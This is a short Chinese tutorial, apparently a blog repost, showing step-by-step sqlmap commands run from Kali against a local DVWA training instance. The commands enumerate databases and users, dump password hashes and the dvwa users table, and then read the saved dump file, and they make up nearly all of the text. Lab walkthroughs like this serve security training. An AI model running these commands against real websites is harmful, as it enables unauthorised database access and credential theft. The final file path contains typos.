zoukankan      html  css  js  c++  java

  • kali使用sqlmap注入dvma

    1、爆出来所有的数据库
    root@kali:-# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" --batch --dbs

     

     2、爆出来当前数据库

    root@kali:~# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" --batch --current-db

     

     3、查看数据库的用户

    root@kali:~# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" --batch --users

     4、爆出用户名与密码

    root@kali:~# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" --batch --users --passwords

    5、查看(指定数据库)中所有的表

    root@kali:~# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" -D dvwa --tables

    6、查看(指定表)中的数据

    root@kali:~# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" --batch -D dvwa -T users --columns

     

     7、用户名密码保存到本地

    root@kali:~# sqlmap -u "http://192.168.1.118/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=it9f5egcoh5hd9j19s7jjqva24" --batch -D dvwa -T users -C "user,password" --dump

     8、查看保存的内容

    root@kali:~# cat /root/.sqLmap/output/192.168.1.118/dump/dvwa/users.cvs
  • 相关阅读:
    request.getParameterMap 跟request.getParameter区别
    SQL语句中---删除表数据drop、truncate和delete的用法
    今日出现两个错误
    html和jsp的区别及优缺点
    怎么将 美国的日期格式改成中国的日期格式
    java web相关的面试题
    i++与++i的关系
    Oracle常见的语法,以及跟MySQL的区别
    DBA
    java基础之印象笔记
  • 原文地址:https://www.cnblogs.com/wbly2019/p/14632664.html
Copyright © 2011-2022 走看看